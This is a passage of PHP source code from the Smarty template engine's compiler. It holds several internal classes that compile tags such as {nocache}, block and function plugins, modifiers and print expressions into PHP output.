 * @package    Smarty
 * @subpackage Compiler
 */
class Smarty_Internal_Compile_Ldelim extends Smarty_Internal_CompileBase
{
    /**
     * Compiles code for the {ldelim} tag
     * This tag does output the left delimiter
     *
     * @param array                                 $args     array with attributes from parser
     * @param \Smarty_Internal_TemplateCompilerBase $compiler compiler object
     *
     * @return string compiled code
     * @throws \SmartyCompilerException
     */
    public function compile($args, Smarty_Internal_TemplateCompilerBase $compiler)
    {
        $_attr = $this->getAttributes($compiler, $args);
        if ($_attr[ 'nocache' ] === true) {
            $compiler->trigger_template_error('nocache option not allowed', null, true);
        }
        return $compiler->smarty->left_delimiter;
    }
}
<?php
/**
 * Smarty Internal Plugin Compile Make_Nocache
 * Compiles the {make_nocache} tag
 *
 * @package    Smarty
 * @subpackage Compiler
 * @author     Uwe Tews
 */

/**
 * Smarty Internal Plugin Compile Make_Nocache Class
 *
 * @package    Smarty
 * @subpackage Compiler
 */
class Smarty_Internal_Compile_Make_Nocache extends Smarty_Internal_CompileBase
{
    /**
     * Attribute definition: Overwrites base class.
     *
     * @var array
     * @see Smarty_Internal_CompileBase
     */
    public $option_flags = array();

    /**
     * Array of names of required attribute required by tag
     *
     * @var array
     */
    public $required_attributes = array('var');

    /**
     * Shorttag attribute order defined by its names
     *
     * @var array
     */
    public $shorttag_order = array('var');

    /**
     * Compiles code for the {make_nocache} tag
     *
     * @param array                                 $args     array with attributes from parser
     * @param \Smarty_Internal_TemplateCompilerBase $compiler compiler object
     *
     * @return string compiled code
     */
    public function compile($args, Smarty_Internal_TemplateCompilerBase $compiler)
    {
        // check and get attributes
        $_attr = $this->getAttributes($compiler, $args);
        if ($compiler->template->caching) {
            $output = "<?php \$_smarty_tpl->smarty->ext->_make_nocache->save(\$_smarty_tpl, {$_attr[ 'var' ]});\n?>\n";
            $compiler->template->compiled->has_nocache_code = true;
            $compiler->suppressNocacheProcessing = true;
            return $output;
        } else {
            return true;
        }
    }
}
<?php
/**
 * Smarty Internal Plugin Compile Nocache
 * Compiles the {nocache} {/nocache} tags.
 *
 * @package    Smarty
 * @subpackage Compiler
 * @author     Uwe Tews
 */

/**
 * Smarty Internal Plugin Compile Nocache Class
 *
 * @package    Smarty
 * @subpackage Compiler
 */
class Smarty_Internal_Compile_Nocache extends Smarty_Internal_CompileBase
{
    /**
     * Array of names of valid option flags
     *
     * @var array
     */
    public $option_flags = array();

    /**
     * Compiles code for the {nocache} tag
     * This tag does not generate compiled output. It only sets a compiler flag.
     *
     * @param array                                 $args     array with attributes from parser
     * @param \Smarty_Internal_TemplateCompilerBase $compiler compiler object
     *
     * @return bool
     */
    public function compile($args, Smarty_Internal_TemplateCompilerBase $compiler)
    {
        $_attr = $this->getAttributes($compiler, $args);
        $this->openTag($compiler, 'nocache', array($compiler->nocache));
        // enter nocache mode
        $compiler->nocache = true;
        // this tag does not return compiled code
        $compiler->has_code = false;
        return true;
    }
}

/**
 * Smarty Internal Plugin Compile Nocacheclose Class
 *
 * @package    Smarty
 * @subpackage Compiler
 */
class Smarty_Internal_Compile_Nocacheclose extends Smarty_Internal_CompileBase
{
    /**
     * Compiles code for the {/nocache} tag
     * This tag does not generate compiled output. It only sets a compiler flag.
     *
     * @param array                                 $args     array with attributes from parser
     * @param \Smarty_Internal_TemplateCompilerBase $compiler compiler object
     *
     * @return bool
     */
    public function compile($args, Smarty_Internal_TemplateCompilerBase $compiler)
    {
        $_attr = $this->getAttributes($compiler, $args);
        // leave nocache mode
        list($compiler->nocache) = $this->closeTag($compiler, array('nocache'));
        // this tag does not return compiled code
        $compiler->has_code = false;
        return true;
    }
}
<?php
/**
 * This file is part of Smarty.
 *
 * (c) 2015 Uwe Tews
 *
 * For the full copyright and license information, please view the LICENSE
 * file that was distributed with this source code.
 */

/**
 * Smarty Internal Plugin Compile Parent Class
 *
 * @author Uwe Tews <uwe.tews@googlemail.com>
 */
class Smarty_Internal_Compile_Parent extends Smarty_Internal_Compile_Child
{
    /**
     * Tag name
     *
     * @var string
     */
    public $tag = 'parent';

    /**
     * Block type
     *
     * @var string
     */
    public $blockType = 'Parent';
}
<?php
/**
 * Smarty Internal Plugin Compile Block Plugin
 * Compiles code for the execution of block plugin
 *
 * @package    Smarty
 * @subpackage Compiler
 * @author     Uwe Tews
 */

/**
 * Smarty Internal Plugin Compile Block Plugin Class
 *
 * @package    Smarty
 * @subpackage Compiler
 */
class Smarty_Internal_Compile_Private_Block_Plugin extends Smarty_Internal_CompileBase
{
    /**
     * Attribute definition: Overwrites base class.
     *
     * @var array
     * @see Smarty_Internal_CompileBase
     */
    public $optional_attributes = array('_any');

    /**
     * nesting level
     *
     * @var int
     */
    public $nesting = 0;

    /**
     * Compiles code for the execution of block plugin
     *
     * @param array                                 $args      array with attributes from parser
     * @param \Smarty_Internal_TemplateCompilerBase $compiler  compiler object
     * @param array                                 $parameter array with compilation parameter
     * @param string                                $tag       name of block plugin
     * @param string                                $function  PHP function name
     *
     * @return string compiled code
     * @throws \SmartyCompilerException
     * @throws \SmartyException
     */
    public function compile($args, Smarty_Internal_TemplateCompilerBase $compiler, $parameter, $tag, $function = null)
    {
        if (!isset($tag[ 5 ]) || substr($tag, -5) !== 'close') {
            // opening tag of block plugin
            // check and get attributes
            $_attr = $this->getAttributes($compiler, $args);
            $this->nesting++;
            unset($_attr[ 'nocache' ]);
            list($callback, $_paramsArray, $callable) = $this->setup($compiler, $_attr, $tag, $function);
            $_params = 'array(' . implode(',', $_paramsArray) . ')';
            // compile code
            $output = "<?php ";
            if (is_array($callback)) {
                $output .= "\$_block_plugin{$this->nesting} = isset({$callback[0]}) ? {$callback[0]} : null;\n";
                $callback = "\$_block_plugin{$this->nesting}{$callback[1]}";
            }
            if (isset($callable)) {
                $output .= "if (!is_callable({$callable})) {\nthrow new SmartyException('block tag \'{$tag}\' not callable or registered');\n}\n";
            }
            $output .= "\$_smarty_tpl->smarty->_cache['_tag_stack'][] = array('{$tag}', {$_params});\n";
            $output .= "\$_block_repeat=true;\necho {$callback}({$_params}, null, \$_smarty_tpl, \$_block_repeat);\nwhile (\$_block_repeat) {\nob_start();?>";
            $this->openTag($compiler, $tag, array($_params, $compiler->nocache, $callback));
            // maybe nocache because of nocache variables or nocache plugin
            $compiler->nocache = $compiler->nocache | $compiler->tag_nocache;
        } else {
            // must endblock be nocache?
            if ($compiler->nocache) {
                $compiler->tag_nocache = true;
            }
            // closing tag of block plugin, restore nocache
            list($_params, $compiler->nocache, $callback) = $this->closeTag($compiler, substr($tag, 0, -5));
            // compile code
            if (!isset($parameter[ 'modifier_list' ])) {
                $mod_pre = $mod_post = $mod_content = '';
                $mod_content2 = 'ob_get_clean()';
            } else {
                $mod_content2 = "\$_block_content{$this->nesting}";
                $mod_content = "\$_block_content{$this->nesting} = ob_get_clean();\n";
                $mod_pre = "ob_start();\n";
                $mod_post = 'echo ' . $compiler->compileTag(
                        'private_modifier',
                        array(),
                        array(
                            'modifierlist' => $parameter[ 'modifier_list' ],
                            'value'        => 'ob_get_clean()'
                        )
                    ) . ";\n";
            }
            $output =
                "<?php {$mod_content}\$_block_repeat=false;\n{$mod_pre}echo {$callback}({$_params}, {$mod_content2}, \$_smarty_tpl, \$_block_repeat);\n{$mod_post}}\n";
            $output .= 'array_pop($_smarty_tpl->smarty->_cache[\'_tag_stack\']);?>';
        }
        return $output;
    }

    /**
     * Setup callback and parameter array
     *
     * @param \Smarty_Internal_TemplateCompilerBase $compiler
     * @param array                                 $_attr attributes
     * @param string                                $tag
     * @param string                                $function
     *
     * @return array
     */
    public function setup(Smarty_Internal_TemplateCompilerBase $compiler, $_attr, $tag, $function)
    {
        $_paramsArray = array();
        foreach ($_attr as $_key => $_value) {
            if (is_int($_key)) {
                $_paramsArray[] = "$_key=>$_value";
            } else {
                $_paramsArray[] = "'$_key'=>$_value";
            }
        }
        return array($function, $_paramsArray, null);
    }
}
<?php
/**
 * Smarty Internal Plugin Compile ForeachSection
 * Shared methods for {foreach} {section} tags
 *
 * @package    Smarty
 * @subpackage Compiler
 * @author     Uwe Tews
 */

/**
 * Smarty Internal Plugin Compile ForeachSection Class
 *
 * @package    Smarty
 * @subpackage Compiler
 */
class Smarty_Internal_Compile_Private_ForeachSection extends Smarty_Internal_CompileBase
{
    /**
     * Name of this tag
     *
     * @var string
     */
    public $tagName = '';

    /**
     * Valid properties of $smarty.xxx variable
     *
     * @var array
     */
    public $nameProperties = array();

    /**
     * {section} tag has no item properties
     *
     * @var array
     */
    public $itemProperties = null;

    /**
     * {section} tag has always name attribute
     *
     * @var bool
     */
    public $isNamed = true;

    /**
     * @var array
     */
    public $matchResults = array();

    /**
     * Preg search pattern
     *
     * @var string
     */
    private $propertyPreg = '';

    /**
     * Offsets in preg match result
     *
     * @var array
     */
    private $resultOffsets = array();

    /**
     * Start offset
     *
     * @var int
     */
    private $startOffset = 0;

    /**
     * Scan sources for used tag attributes
     *
     * @param array                                 $attributes
     * @param \Smarty_Internal_TemplateCompilerBase $compiler
     *
     * @throws \SmartyException
     */
    public function scanForProperties($attributes, Smarty_Internal_TemplateCompilerBase $compiler)
    {
        $this->propertyPreg = '~(';
        $this->startOffset = 1;
        $this->resultOffsets = array();
        $this->matchResults = array('named' => array(), 'item' => array());
        if (isset($attributes[ 'name' ])) {
            $this->buildPropertyPreg(true, $attributes);
        }
        if (isset($this->itemProperties)) {
            if ($this->isNamed) {
                $this->propertyPreg .= '|';
            }
            $this->buildPropertyPreg(false, $attributes);
        }
        $this->propertyPreg .= ')\W~i';
        // Template source
        $this->matchTemplateSource($compiler);
        // Parent template source
        $this->matchParentTemplateSource($compiler);
        // {block} source
        $this->matchBlockSource($compiler);
    }

    /**
     * Build property preg string
     *
     * @param bool  $named
     * @param array $attributes
     */
    public function buildPropertyPreg($named, $attributes)
    {
        if ($named) {
            $this->resultOffsets[ 'named' ] = $this->startOffset = $this->startOffset + 3;
            $this->propertyPreg .= "(([\$]smarty[.]{$this->tagName}[.]" .
                                   ($this->tagName === 'section' ? "|[\[]\s*" : '') .
                                   "){$attributes['name']}[.](";
            $properties = $this->nameProperties;
        } else {
            $this->resultOffsets[ 'item' ] = $this->startOffset = $this->startOffset + 2;
            $this->propertyPreg .= "([\$]{$attributes['item']}[@](";
            $properties = $this->itemProperties;
        }
        $propName = reset($properties);
        while ($propName) {
            $this->propertyPreg .= "{$propName}";
            $propName = next($properties);
            if ($propName) {
                $this->propertyPreg .= '|';
            }
        }
        $this->propertyPreg .= '))';
    }

    /**
     * Find matches in source string
     *
     * @param string $source
     */
    public function matchProperty($source)
    {
        preg_match_all($this->propertyPreg, $source, $match);
        foreach ($this->resultOffsets as $key => $offset) {
            foreach ($match[ $offset ] as $m) {
                if (!empty($m)) {
                    $this->matchResults[ $key ][ smarty_strtolower_ascii($m) ] = true;
                }
            }
        }
    }

    /**
     * Find matches in template source
     *
     * @param \Smarty_Internal_TemplateCompilerBase $compiler
     */
    public function matchTemplateSource(Smarty_Internal_TemplateCompilerBase $compiler)
    {
        $this->matchProperty($compiler->parser->lex->data);
    }

    /**
     * Find matches in all parent template source
     *
     * @param \Smarty_Internal_TemplateCompilerBase $compiler
     *
     * @throws \SmartyException
     */
    public function matchParentTemplateSource(Smarty_Internal_TemplateCompilerBase $compiler)
    {
        // search parent compiler template source
        $nextCompiler = $compiler;
        while ($nextCompiler !== $nextCompiler->parent_compiler) {
            $nextCompiler = $nextCompiler->parent_compiler;
            if ($compiler !== $nextCompiler) {
                // get template source
                $_content = $nextCompiler->template->source->getContent();
                if ($_content !== '') {
                    // run pre filter if required
                    if ((isset($nextCompiler->smarty->autoload_filters[ 'pre' ]) ||
                         isset($nextCompiler->smarty->registered_filters[ 'pre' ]))
                    ) {
                        $_content = $nextCompiler->smarty->ext->_filterHandler->runFilter(
                            'pre',
                            $_content,
                            $nextCompiler->template
                        );
                    }
                    $this->matchProperty($_content);
                }
            }
        }
    }

    /**
     * Find matches in {block} tag source
     *
     * @param \Smarty_Internal_TemplateCompilerBase $compiler
     */
    public function matchBlockSource(Smarty_Internal_TemplateCompilerBase $compiler)
    {
    }

    /**
     * Compiles code for the {$smarty.foreach.xxx} or {$smarty.section.xxx}tag
     *
     * @param array                                 $args      array with attributes from parser
     * @param \Smarty_Internal_TemplateCompilerBase $compiler  compiler object
     * @param array                                 $parameter array with compilation parameter
     *
     * @return string compiled code
     * @throws \SmartyCompilerException
     */
    public function compileSpecialVariable($args, Smarty_Internal_TemplateCompilerBase $compiler, $parameter)
    {
        $tag = smarty_strtolower_ascii(trim($parameter[ 0 ], '"\''));
        $name = isset($parameter[ 1 ]) ? $compiler->getId($parameter[ 1 ]) : false;
        if (!$name) {
            $compiler->trigger_template_error("missing or illegal \$smarty.{$tag} name attribute", null, true);
        }
        $property = isset($parameter[ 2 ]) ? smarty_strtolower_ascii($compiler->getId($parameter[ 2 ])) : false;
        if (!$property || !in_array($property, $this->nameProperties)) {
            $compiler->trigger_template_error("missing or illegal \$smarty.{$tag} property attribute", null, true);
        }
        $tagVar = "'__smarty_{$tag}_{$name}'";
        return "(isset(\$_smarty_tpl->tpl_vars[{$tagVar}]->value['{$property}']) ? \$_smarty_tpl->tpl_vars[{$tagVar}]->value['{$property}'] : null)";
    }
}
<?php
/**
 * Smarty Internal Plugin Compile Function Plugin
 * Compiles code for the execution of function plugin
 *
 * @package    Smarty
 * @subpackage Compiler
 * @author     Uwe Tews
 */

/**
 * Smarty Internal Plugin Compile Function Plugin Class
 *
 * @package    Smarty
 * @subpackage Compiler
 */
class Smarty_Internal_Compile_Private_Function_Plugin extends Smarty_Internal_CompileBase
{
    /**
     * Attribute definition: Overwrites base class.
     *
     * @var array
     * @see Smarty_Internal_CompileBase
     */
    public $required_attributes = array();

    /**
     * Attribute definition: Overwrites base class.
     *
     * @var array
     * @see Smarty_Internal_CompileBase
     */
    public $optional_attributes = array('_any');

    /**
     * Compiles code for the execution of function plugin
     *
     * @param array                                 $args      array with attributes from parser
     * @param \Smarty_Internal_TemplateCompilerBase $compiler  compiler object
     * @param array                                 $parameter array with compilation parameter
     * @param string                                $tag       name of function plugin
     * @param string                                $function  PHP function name
     *
     * @return string compiled code
     * @throws \SmartyCompilerException
     * @throws \SmartyException
     */
    public function compile($args, Smarty_Internal_TemplateCompilerBase $compiler, $parameter, $tag, $function)
    {
        // check and get attributes
        $_attr = $this->getAttributes($compiler, $args);
        unset($_attr[ 'nocache' ]);
        // convert attributes into parameter array string
        $_paramsArray = array();
        foreach ($_attr as $_key => $_value) {
            if (is_int($_key)) {
                $_paramsArray[] = "$_key=>$_value";
            } else {
                $_paramsArray[] = "'$_key'=>$_value";
            }
        }
        $_params = 'array(' . implode(',', $_paramsArray) . ')';
        // compile code
        $output = "{$function}({$_params},\$_smarty_tpl)";
        if (!empty($parameter[ 'modifierlist' ])) {
            $output = $compiler->compileTag(
                'private_modifier',
                array(),
                array(
                    'modifierlist' => $parameter[ 'modifierlist' ],
                    'value'        => $output
                )
            );
        }
        $output = "<?php echo {$output};?>\n";
        return $output;
    }
}
<?php
/**
 * Smarty Internal Plugin Compile Modifier
 * Compiles code for modifier execution
 *
 * @package    Smarty
 * @subpackage Compiler
 * @author     Uwe Tews
 */

/**
 * Smarty Internal Plugin Compile Modifier Class
 *
 * @package    Smarty
 * @subpackage Compiler
 */
class Smarty_Internal_Compile_Private_Modifier extends Smarty_Internal_CompileBase
{
    /**
     * Compiles code for modifier execution
     *
     * @param array                                 $args      array with attributes from parser
     * @param \Smarty_Internal_TemplateCompilerBase $compiler  compiler object
     * @param array                                 $parameter array with compilation parameter
     *
     * @return string compiled code
     * @throws \SmartyCompilerException
     * @throws \SmartyException
     */
    public function compile($args, Smarty_Internal_TemplateCompilerBase $compiler, $parameter)
    {
        // check and get attributes
        $_attr = $this->getAttributes($compiler, $args);
        $output = $parameter[ 'value' ];
        // loop over list of modifiers
        foreach ($parameter[ 'modifierlist' ] as $single_modifier) {
            /* @var string $modifier */
            $modifier = $single_modifier[ 0 ];
            $single_modifier[ 0 ] = $output;
            $params = implode(',', $single_modifier);
            // check if we know already the type of modifier
            if (isset($compiler->known_modifier_type[ $modifier ])) {
                $modifier_types = array($compiler->known_modifier_type[ $modifier ]);
            } else {
                $modifier_types = array(1, 2, 3, 4, 5, 6);
            }
            foreach ($modifier_types as $type) {
                switch ($type) {
                    case 1:
                        // registered modifier
                        if (isset($compiler->smarty->registered_plugins[ Smarty::PLUGIN_MODIFIER ][ $modifier ])) {
                            if (is_callable($compiler->smarty->registered_plugins[ Smarty::PLUGIN_MODIFIER ][ $modifier ][ 0 ])) {
                                $output =
                                    sprintf(
                                        'call_user_func_array($_smarty_tpl->registered_plugins[ \'%s\' ][ %s ][ 0 ], array( %s ))',
                                        Smarty::PLUGIN_MODIFIER,
                                        var_export($modifier, true),
                                        $params
                                    );
                                $compiler->known_modifier_type[ $modifier ] = $type;
                                break 2;
                            }
                        }
                        break;
                    case 2:
                        // registered modifier compiler
                        if (isset($compiler->smarty->registered_plugins[ Smarty::PLUGIN_MODIFIERCOMPILER ][ $modifier ][ 0 ])) {
                            $output =
                                call_user_func(
                                    $compiler->smarty->registered_plugins[ Smarty::PLUGIN_MODIFIERCOMPILER ][ $modifier ][ 0 ],
                                    $single_modifier,
                                    $compiler->smarty
                                );
                            $compiler->known_modifier_type[ $modifier ] = $type;
                            break 2;
                        }
                        break;
                    case 3:
                        // modifiercompiler plugin
                        if ($compiler->smarty->loadPlugin('smarty_modifiercompiler_' . $modifier)) {
                            // check if modifier allowed
                            if (!is_object($compiler->smarty->security_policy)
                                || $compiler->smarty->security_policy->isTrustedModifier($modifier, $compiler)
                            ) {
                                $plugin = 'smarty_modifiercompiler_' . $modifier;
                                $output = $plugin($single_modifier, $compiler);
                            }
                            $compiler->known_modifier_type[ $modifier ] = $type;
                            break 2;
                        }
                        break;
                    case 4:
                        // modifier plugin
                        if ($function = $compiler->getPlugin($modifier, Smarty::PLUGIN_MODIFIER)) {
                            // check if modifier allowed
                            if (!is_object($compiler->smarty->security_policy)
                                || $compiler->smarty->security_policy->isTrustedModifier($modifier, $compiler)
                            ) {
                                $output = "{$function}({$params})";
                            }
                            $compiler->known_modifier_type[ $modifier ] = $type;
                            break 2;
                        }
                        break;
                    case 5:
                        // PHP function
                        if (is_callable($modifier)) {
                            // check if modifier allowed
                            if (!is_object($compiler->smarty->security_policy)
                                || $compiler->smarty->security_policy->isTrustedPhpModifier($modifier, $compiler)
                            ) {
                                if (!in_array($modifier, ['time', 'join', 'is_array', 'in_array'])) {
                                    trigger_error('Using unregistered function "' . $modifier . '" in a template is deprecated and will be ' .
                                        'removed in a future release. Use Smarty::registerPlugin to explicitly register ' .
                                        'a custom modifier.', E_USER_DEPRECATED);
                                }
                                $output = "{$modifier}({$params})";
                            }
                            $compiler->known_modifier_type[ $modifier ] = $type;
                            break 2;
                        }
                        break;
                    case 6:
                        // default plugin handler
                        if (isset($compiler->default_handler_plugins[ Smarty::PLUGIN_MODIFIER ][ $modifier ])
                            || (is_callable($compiler->smarty->default_plugin_handler_func)
                                && $compiler->getPluginFromDefaultHandler($modifier, Smarty::PLUGIN_MODIFIER))
                        ) {
                            $function = $compiler->default_handler_plugins[ Smarty::PLUGIN_MODIFIER ][ $modifier ][ 0 ];
                            // check if modifier allowed
                            if (!is_object($compiler->smarty->security_policy)
                                || $compiler->smarty->security_policy->isTrustedModifier($modifier, $compiler)
                            ) {
                                if (!is_array($function)) {
                                    $output = "{$function}({$params})";
                                } else {
                                    if (is_object($function[ 0 ])) {
                                        $output = $function[ 0 ] . '->' . $function[ 1 ] . '(' . $params . ')';
                                    } else {
                                        $output = $function[ 0 ] . '::' . $function[ 1 ] . '(' . $params . ')';
                                    }
                                }
                            }
                            if (isset($compiler->required_plugins[ 'nocache' ][ $modifier ][ Smarty::PLUGIN_MODIFIER ][ 'file' ])
                                ||
                                isset($compiler->required_plugins[ 'compiled' ][ $modifier ][ Smarty::PLUGIN_MODIFIER ][ 'file' ])
                            ) {
                                // was a plugin
                                $compiler->known_modifier_type[ $modifier ] = 4;
                            } else {
                                $compiler->known_modifier_type[ $modifier ] = $type;
                            }
                            break 2;
                        }
                }
            }
            if (!isset($compiler->known_modifier_type[ $modifier ])) {
                $compiler->trigger_template_error("unknown modifier '{$modifier}'", null, true);
            }
        }
        return $output;
    }
}
<?php
/**
 * Smarty Internal Plugin Compile Object Block Function
 * Compiles code for registered objects as block function
 *
 * @package    Smarty
 * @subpackage Compiler
 * @author     Uwe Tews
 */

/**
 * Smarty Internal Plugin Compile Object Block Function Class
 *
 * @package    Smarty
 * @subpackage Compiler
 */
class Smarty_Internal_Compile_Private_Object_Block_Function extends Smarty_Internal_Compile_Private_Block_Plugin
{
    /**
     * Setup callback and parameter array
     *
     * @param \Smarty_Internal_TemplateCompilerBase $compiler
     * @param array                                 $_attr attributes
     * @param string                                $tag
     * @param string                                $method
     *
     * @return array
     */
    public function setup(Smarty_Internal_TemplateCompilerBase $compiler, $_attr, $tag, $method)
    {
        $_paramsArray = array();
        foreach ($_attr as $_key => $_value) {
            if (is_int($_key)) {
                $_paramsArray[] = "$_key=>$_value";
            } else {
                $_paramsArray[] = "'$_key'=>$_value";
            }
        }
        $callback = array("\$_smarty_tpl->smarty->registered_objects['{$tag}'][0]", "->{$method}");
        return array($callback, $_paramsArray, "array(\$_block_plugin{$this->nesting}, '{$method}')");
    }
}
<?php
/**
 * Smarty Internal Plugin Compile Object Function
 * Compiles code for registered objects as function
 *
 * @package    Smarty
 * @subpackage Compiler
 * @author     Uwe Tews
 */

/**
 * Smarty Internal Plugin Compile Object Function Class
 *
 * @package    Smarty
 * @subpackage Compiler
 */
class Smarty_Internal_Compile_Private_Object_Function extends Smarty_Internal_CompileBase
{
    /**
     * Attribute definition: Overwrites base class.
     *
     * @var array
     * @see Smarty_Internal_CompileBase
     */
    public $optional_attributes = array('_any');

    /**
     * Compiles code for the execution of function plugin
     *
     * @param array                                 $args      array with attributes from parser
     * @param \Smarty_Internal_TemplateCompilerBase $compiler  compiler object
     * @param array                                 $parameter array with compilation parameter
     * @param string                                $tag       name of function
     * @param string                                $method    name of method to call
     *
     * @return string compiled code
     * @throws \SmartyCompilerException
     * @throws \SmartyException
     */
    public function compile($args, Smarty_Internal_TemplateCompilerBase $compiler, $parameter, $tag, $method)
    {
        // check and get attributes
        $_attr = $this->getAttributes($compiler, $args);
        unset($_attr[ 'nocache' ]);
        $_assign = null;
        if (isset($_attr[ 'assign' ])) {
            $_assign = $_attr[ 'assign' ];
            unset($_attr[ 'assign' ]);
        }
        // method or property ?
        if (is_callable(array($compiler->smarty->registered_objects[ $tag ][ 0 ], $method))) {
            // convert attributes into parameter array string
            if ($compiler->smarty->registered_objects[ $tag ][ 2 ]) {
                $_paramsArray = array();
                foreach ($_attr as $_key => $_value) {
                    if (is_int($_key)) {
                        $_paramsArray[] = "$_key=>$_value";
                    } else {
                        $_paramsArray[] = "'$_key'=>$_value";
                    }
                }
                $_params = 'array(' . implode(',', $_paramsArray) . ')';
                $output = "\$_smarty_tpl->smarty->registered_objects['{$tag}'][0]->{$method}({$_params},\$_smarty_tpl)";
            } else {
                $_params = implode(',', $_attr);
                $output = "\$_smarty_tpl->smarty->registered_objects['{$tag}'][0]->{$method}({$_params})";
            }
        } else {
            // object property
            $output = "\$_smarty_tpl->smarty->registered_objects['{$tag}'][0]->{$method}";
        }
        if (!empty($parameter[ 'modifierlist' ])) {
            $output = $compiler->compileTag(
                'private_modifier',
                array(),
                array('modifierlist' => $parameter[ 'modifierlist' ], 'value' => $output)
            );
        }
        if (empty($_assign)) {
            return "<?php echo {$output};?>\n";
        } else {
            return "<?php \$_smarty_tpl->assign({$_assign},{$output});?>\n";
        }
    }
}
<?php
/**
 * Smarty Internal Plugin Compile Print Expression
 * Compiles any tag which will output an expression or variable
 *
 * @package    Smarty
 * @subpackage Compiler
 * @author     Uwe Tews
 */

/**
 * Smarty Internal Plugin Compile Print Expression Class
 *
 * @package    Smarty
 * @subpackage Compiler
 */
class Smarty_Internal_Compile_Private_Print_Expression extends Smarty_Internal_CompileBase
{
    /**
     * Attribute definition: Overwrites base class.
     *
     * @var array
     * @see Smarty_Internal_CompileBase
     */
    public $optional_attributes = array('assign');

    /**
     * Attribute definition: Overwrites base class.
     *
     * @var array
     * @see Smarty_Internal_CompileBase
     */
    public $option_flags = array('nocache', 'nofilter');

    /**
     * Compiles code for generating output from any expression
     *
     * @param array                                 $args      array with attributes from parser
     * @param \Smarty_Internal_TemplateCompilerBase $compiler  compiler object
     * @param array                                 $parameter array with compilation parameter
     *
     * @return string
     * @throws \SmartyException
     */
    public function compile($args, Smarty_Internal_TemplateCompilerBase $compiler, $parameter)
    {
        // check and get attributes
        $_attr = $this->getAttributes($compiler, $args);
        $output = $parameter[ 'value' ];
        // tag modifier
        if (!empty($parameter[ 'modifierlist' ])) {
            $output = $compiler->compileTag(
                'private_modifier',
                array(),
                array(
                    'modifierlist' => $parameter[ 'modifierlist' ],
                    'value'        => $output
                )
            );
        }
        if (isset($_attr[ 'assign' ])) {
            // assign output to variable
            return "<?php \$_smarty_tpl->assign({$_attr['assign']},{$output});?>";
        } else {
            // display value
            if (!$_attr[ 'nofilter' ]) {
                // default modifier
                if (!empty($compiler->smarty->default_modifiers)) {
                    if (empty($compiler->default_modifier_list)) {
                        $modifierlist = array();
                        foreach ($compiler->smarty->default_modifiers as $key => $single_default_modifier) {
                            preg_match_all(
                                '/(\'[^\'\\\\]*(?:\\\\.[^\'\\\\]*)*\'|"[^"\\\\]*(?:\\\\.[^"\\\\]*)*"|:|[^:]+)/',
                                $single_default_modifier,
                                $mod_array
                            );
                            for ($i = 0, $count = count($mod_array[ 0 ]); $i < $count; $i++) {
                                if ($mod_array[ 0 ][ $i ] !== ':') {
                                    $modifierlist[ $key ][] = $mod_array[ 0 ][ $i ];
                                }
                            }
                        }
                        $compiler->default_modifier_list = $modifierlist;
                    }
                    $output = $compiler->compileTag(
                        'private_modifier',
                        array(),
                        array(
                            'modifierlist' => $compiler->default_modifier_list,
                            'value'        => $output
                        )
                    );
                }
                // autoescape html
                if ($compiler->template->smarty->escape_html) {
                    $output = "htmlspecialchars((string) ({$output}), ENT_QUOTES, '" . addslashes(Smarty::$_CHARSET) . "')";
                }
                // loop over registered filters
                if (!empty($compiler->template->smarty->registered_filters[ Smarty::FILTER_VARIABLE ])) {
                    foreach ($compiler->template->smarty->registered_filters[ Smarty::FILTER_VARIABLE ] as $key =>
                        $function) {
                        if (!is_array($function)) {
                            $output = "{$function}({$output},\$_smarty_tpl)";
                        } elseif (is_object($function[ 0 ])) {
                            $output =
                                "\$_smarty_tpl->smarty->registered_filters[Smarty::FILTER_VARIABLE]['{$key}'][0]->{$function[1]}({$output},\$_smarty_tpl)";
                        } else {
                            $output = "{$function[0]}::{$function[1]}({$output},\$_smarty_tpl)";
                        }
                    }
                }
                // auto loaded filters
                if (isset($compiler->smarty->autoload_filters[ Smarty::FILTER_VARIABLE ])) {
                    foreach ((array)$compiler->template->smarty->autoload_filters[ Smarty::FILTER_VARIABLE ] as $name) {
                        $result = $this->compile_variable_filter($compiler, $name, $output);
                        if ($result !== false) {
                            $output = $result;
                        } else {
                            // not found, throw exception
                            throw new SmartyException("Unable to load variable filter '{$name}'");
                        }
                    }
                }
                foreach ($compiler->variable_filters as $filter) {
                    if (count($filter) === 1
                        && ($result = $this->compile_variable_filter($compiler, $filter[ 0 ], $output)) !== false
                    ) {
                        $output = $result;
                    } else {
                        $output = $compiler->compileTag(
                            'private_modifier',
                            array(),
                            array('modifierlist' => array($filter), 'value' => $output)
                        );
                    }
                }
            }
            $output = "<?php echo {$output};?>\n";
        }
        return $output;
    }

    /**
     * @param \Smarty_Internal_TemplateCompilerBase $compiler compiler object
     * @param string                                $name     name of variable filter
     * @param string                                $output   embedded output
     *
     * @return string
     * @throws \SmartyException
     */
    private function compile_variable_filter(Smarty_Internal_TemplateCompilerBase $compiler, $name, $output)
    {
        $function = $compiler->getPlugin($name, 'variablefilter');
        if ($function) {
            return "{$function}({$output},\$_smarty_tpl)";
        } else {
            // not found
            return false;
        }
    }
}
<?php
/**
 * Smarty Internal Plugin Compile Registered Block
 * Compiles code for the execution of a registered block function
 *
 * @package    Smarty
 * @subpackage Compiler
 * @author     Uwe Tews
 */

/**
 * Smarty Internal Plugin Compile Registered Block Class
 *
 * @package    Smarty
 * @subpackage Compiler
 */
class Smarty_Internal_Compile_Private_Registered_Block extends Smarty_Internal_Compile_Private_Block_Plugin
{
    /**
     * Setup callback, parameter array and nocache mode
     *
     * @param \Smarty_Internal_TemplateCompilerBase $compiler
     * @param array                                 $_attr attributes
     * @param string                                $tag
     * @param null                                  $function
     *
     * @return array
     */
    public function setup(Smarty_Internal_TemplateCompilerBase $compiler, $_attr, $tag, $function)
    {
        if (isset($compiler->smarty->registered_plugins[ Smarty::PLUGIN_BLOCK ][ $tag ])) {
            $tag_info = $compiler->smarty->registered_plugins[ Smarty::PLUGIN_BLOCK ][ $tag ];
            $callback = $tag_info[ 0 ];
            if (is_array($callback)) {
                if (is_object($callback[ 0 ])) {
                    $callable = "array(\$_block_plugin{$this->nesting}, '{$callback[1]}')";
                    $callback =
                        array("\$_smarty_tpl->smarty->registered_plugins['block']['{$tag}'][0][0]", "->{$callback[1]}");
                } else {
                    $callable = "array(\$_block_plugin{$this->nesting}, '{$callback[1]}')";
                    $callback =
                        array("\$_smarty_tpl->smarty->registered_plugins['block']['{$tag}'][0][0]", "::{$callback[1]}");
                }
            } else {
                $callable = "\$_block_plugin{$this->nesting}";
                $callback = array("\$_smarty_tpl->smarty->registered_plugins['block']['{$tag}'][0]", '');
            }
        } else {
